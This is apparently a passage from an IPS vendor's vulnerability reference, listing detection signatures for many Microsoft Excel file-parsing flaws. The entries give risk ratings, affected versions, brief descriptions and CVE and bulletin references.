https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0112
BID-28095
http://www.securityfocus.com/bid/28095
OSVDB-42723
http://www.osvdb.org/42723
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-File-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is due to the way in which Excel processes various modified bytes in Excel files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted Excel document. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.
Situation: File-OLE_Microsoft-Excel-File-Parsing-Memory-Corruption
References:
CVE-2012-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0143
BID-53374
http://www.securityfocus.com/bid/53374
OSVDB-81726
http://www.osvdb.org/81726
MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030
Back to top

Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2007; Microsoft Excel 2004 for Mac
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
File-OLE_Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
References:
CVE-2010-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0262
BID-38553
http://www.securityfocus.com/bid/38553
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in numerous versions of Microsoft Excel. The flaw is caused by insufficient checks when handling the Style record of the document, resulting in a stack buffer overflow. An attacker can leverage this vulnerability by enticing a user to open a crafted Excel Spreadsheet document, thereby injecting and executing arbitrary code. The vendor has released an updated security bulletin addressing this issue in the 2006 October patch release cycle. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to loss of data in cases where spreadsheet documents are open. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application would also most likely stop functioning as a result of such an attack.
Situation: File-OLE_Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow
References:
CVE-2006-3431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431
BID-18872
http://www.securityfocus.com/bid/18872
MS06-059
http://technet.microsoft.com/security/bulletin/MS06-059
Back to top

Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to insufficient validation of an index value when parsing the FORMAT record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: File-OLE_Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption
References:
CVE-2008-3005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3005
BID-30639
http://www.securityfocus.com/bid/30639
MS08-043
http://technet.microsoft.com/security/bulletin/MS08-043
Back to top

Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel. When loading workbooks, Excel does not validate the input data correctly, allowing crafted files with FRTWrapper records to be loaded. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
File-OLE_Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
References:
CVE-2008-3471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3471
BID-31705
http://www.securityfocus.com/bid/31705
MS08-057
http://technet.microsoft.com/security/bulletin/MS08-057
Back to top

Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

About this vulnerability: An attempt to exploit Microsoft Excel vulnerability CVE-2011-0977
Risk: Moderate
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
References:
CVE-2011-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0977
MS11-023
http://technet.microsoft.com/security/bulletin/MS11-023
Back to top

Microsoft-Excel-Heap-Corruption-Vulnerability

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Heap-Corruption-Vulnerability
File-Binary_Microsoft-Excel-Heap-Corruption-Vulnerability
References:
CVE-2011-1988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1988
MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072
Back to top

Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0098
Risk: Moderate
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1652-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to a flaw in the parsing of Label record in Excel documents, causing a buffer overflow. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
File-OLE_Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
References:
CVE-2011-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0098
BID-47235
http://www.securityfocus.com/bid/47235
OSVDB-71759
http://www.osvdb.org/71759
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
File-OLE_Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
References:
CVE-2011-1273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1273
OSVDB-72921
http://www.osvdb.org/72921
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Microsoft-Excel-Information-Disclosure-Vulnerability-CVE-2019-1112

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-1175-5242
Last changed: sgpkg-ips-1652-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: An attempt to exploit a vulnerability in Microsoft Excel
References:
CVE-2019-1112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1112
Back to top

Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0097
Risk: Moderate
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
File-OLE_Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
References:
CVE-2011-0097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0097
BID-47201
http://www.securityfocus.com/bid/47201
OSVDB-71758
http://www.osvdb.org/71758
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-0979
Risk: Moderate
First detected in: sgpkg-ips-387-4219
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979
References:
CVE-2011-0979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0979
OSVDB-70904
http://www.osvdb.org/70904
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Excel. The vulnerability is caused by improper processing of malformed BOOLERR records within Excel spreadsheet files. An attacker may exploit this vulnerability by enticing a user to open a crafted Excel file, which will enable the attacker to inject and execute arbitrary code within the security context of the target user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-Binary_Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution
References:
CVE-2006-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0028
OSVDB-23899
http://www.osvdb.org/23899
MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012
Back to top

Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability exists in the way Microsoft Excel processes files. The vulnerability is a result of insufficient data validation while processing Excel AutoFilter records. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Excel will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-OLE_Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution
References:
CVE-2007-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1214
BID-23780
http://www.securityfocus.com/bid/23780
OSVDB-34395
http://www.osvdb.org/34395
MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023
Back to top

Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Excel. The flaw is caused by an insufficient check of a malformed FNGROUPCOUNT Record in an Excel file. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution
References:
CVE-2006-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1308
BID-18890
http://www.securityfocus.com/bid/18890
MS06-037
http://technet.microsoft.com/security/bulletin/MS06-037
Back to top

Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Office
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to improper handling of malformed formulas. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
File-OLE_Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
References:
CVE-2008-0115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0115
BID-28167
http://www.securityfocus.com/bid/28167
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-Malformed-Imdata-Record

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) may be used to execute code in the privilege of the current user.
Situation: HTTP_Microsoft-Excel-Malformed-Imdata-Record
File-OLE_Microsoft-Excel-Malformed-Imdata-Record
References:
CVE-2007-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0027
BID-21856
http://www.securityfocus.com/bid/21856
OSVDB-31255
http://www.osvdb.org/31255
MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002
Back to top

Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) may be used to execute code in the privilege of the current user.
Situation: HTTP_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
References:
CVE-2007-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0031
BID-21922
http://www.securityfocus.com/bid/21922
OSVDB-31258
http://www.osvdb.org/31258
MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002
Back to top

Microsoft-Excel-Malformed-Record-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Excel. The vulnerability is caused by improper sanitization of an undocumented record in Excel spreadsheet files. An attacker may exploit this vulnerability by enticing a user to open a crafted Excel file, which will enable the attacker to inject and execute arbitrary code within the security context of the target user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution
References:
CVE-2006-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0031
BID-17101
http://www.securityfocus.com/bid/17101
OSVDB-23902
http://www.osvdb.org/23902
MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012
Back to top

Microsoft-Excel-Malformed-Selection-Record-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The flaw is caused by insufficient checks while parsing Selection Records in Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, causing arbitrary code to be injected and executed in the security context of the currently logged in user. In a successful attack, all instances of the vulnerable Microsoft Excel application terminate, or the application stops responding. This can potentially lead to a loss of data. In a more sophisticated attack, where code injection is successful, the behavior of the target is depends on the intended function of the injected code.
Situation: File-OLE_Microsoft-Excel-Malformed-Selection-Record-Code-Execution
References:
CVE-2006-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1301
BID-18853
http://www.securityfocus.com/bid/18853
MS06-037
http://technet.microsoft.com/security/bulletin/MS06-037
Back to top

Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2007
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
File-OLE_Microsoft-Excel-MDXSET-Record-Heap-Overflow-CVE-2010-0261
References:
CVE-2010-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0261
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2007; Microsoft Excel Viewer
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
File-OLE_Microsoft-Excel-MDXTUPLE-Record-Heap-Overflow-CVE-2010-0260
References:
CVE-2010-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0260
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Excel-Memory-Corruption-CVE-2012-1886

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Office Compatibility Pack
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: File-OLE_Microsoft-Excel-Memory-Corruption-CVE-2012-1886
References:
CVE-2012-1886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1886
BID-56426
http://www.securityfocus.com/bid/56426
MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076
Back to top

Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
File-OLE_Microsoft-Excel-Memory-Heap-Overwrite-Vulnerability-CVE-2011-1275
References:
CVE-2011-1275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1275
BID-48160
http://www.securityfocus.com/bid/48160
OSVDB-72923
http://www.osvdb.org/72923
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002; Microsoft Excel 2004 for Mac
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
File-OLE_Microsoft-Excel-Merge-Cell-Record-Pointer-CVE-2010-3237
References:
CVE-2010-3237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3237
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel
Situation: File-OLE_Microsoft-Excel-MergeCells-Record-Heap-Overflow-Vulnerability
References:
CVE-2012-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0185
MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030
Back to top

Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter; Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Excel product. The vulnerability is due to insufficient validation of the contents of a NAME record in a crafted Excel document. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
File-OLE_Microsoft-Excel-Name-Record-Array-Indexing-Stack-Corruption
References:
CVE-2008-4266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4266
BID-32622
http://www.securityfocus.com/bid/32622
MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074
Back to top

Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Excel detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to the improper parsing of a crafted Note record. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted Excel file. Successful exploitation would allow the attacker to disclose sensitive information that may help in further attacks.
Situation: File-OLE_Microsoft-Excel-Note-Record-Information-Disclosure-CVE-2018-8382
References:
CVE-2018-8382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8382
Back to top

Microsoft-Excel-Null-Pointer-DoS

About this vulnerability: Microsoft Excel Null Pointer DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2003
Type: Null Pointer Dereference
Description: A vulnerability exists in Microsoft Excel 2003 which allows remote attackers to cause a denial of service condition by sending an XML file with a corrupted XML or XMS format, which triggers a NULL pointer dereference.
Situation: SMTP_CS-Microsoft-Excel-Null-Pointer-DoS
References:
CVE-2007-1239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1239
BID-22717
http://www.securityfocus.com/bid/22717
Back to top

Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel
Situation: File-OLE_Microsoft-Excel-OBJECTLINK-Memory-Corruption-Vulnerability
References:
CVE-2012-0142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0142
BID-53373
http://www.securityfocus.com/bid/53373
MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030
Back to top

Microsoft-Excel-Office-Drawing-Layer-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Excel. The vulnerability is due to a use-after-free error while handling sOffice drawing objects. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
References:
CVE-2011-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0977
MS11-023
http://technet.microsoft.com/security/bulletin/MS11-023
Back to top

Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Access-Vulnerability-CVE-2011-1274
References:
CVE-2011-1274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1274
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
File-OLE_Microsoft-Excel-Out-Of-Bounds-Array-Indexing-Vulnerability
References:
CVE-2011-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1987
MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072
Back to top

Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Excel detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Windows
Software: Microsoft Excel
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to the inclusion of uninitialized memory when processing of parsed expressions in FORMULA records in Excel workbooks. A remote attacker could exploit this vulnerability by enticing an user to open a maliciously crafted Excel file. Successful exploitation would allow the attacker to disclose sensitive information that may help in further attacks. The vendor, Microsoft, has released the following advisory regarding the vulnerability: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8246
Situation: File-OLE_Microsoft-Excel-Parsed-Expression-Information-Disclosure-CVE-2018-8246
References:
CVE-2018-8246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8246
Back to top

Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to lack of validation on the PtgExtraArray data structure when parsing a crafted Excel file. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target system by enticing a user to open a maliciously crafted file. In situations where code execution is successful the injected code will run within the security context of the currently logged in user. If code execution fails, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
